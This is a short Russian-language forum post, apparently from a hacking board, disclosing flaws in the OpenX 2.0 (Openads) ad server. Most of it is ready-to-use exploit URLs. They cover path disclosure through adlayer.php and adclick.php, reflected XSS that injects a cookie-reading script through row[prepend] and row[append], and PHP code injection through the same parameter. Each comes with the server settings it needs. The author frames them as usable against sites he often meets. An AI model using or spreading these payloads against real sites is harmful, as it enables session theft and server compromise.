Это последняя версия движка в ветке OpenX 2.0. Частенько сталкиваюсь с ним на сайтах, в инете уязвимостей по нему не видел... >> Раскрытие пути: условия: + display_errors = On сплоит: http://openads/adlayer.php?layerstyle=antichat >> XSS условия: + register_globals = On сплоит: http://openads/adcontent.php?bannerid=id&row[prepend]=<script>alert(document.cookie)</script> http://openads/adcontent.php?bannerid=id&row[append]=<script>alert(document.cookie)</script> id - номер существующего баннера >> Выполнение php кода условия: + $phpAds_config['type_html_php'] = true; // default false + наличие html баннера + register_globals = On сплоит: http://openads/adcontent.php?bannerid=id&row[prepend]=<?php phpinfo();?> id - номер существующего html баннера
>> Раскрытие пути: условия: + display_errors = On сплоит: http://openads/adclick.php?bannerid=id&antichat=xe%0Ak%0A id - номер существующего баннера
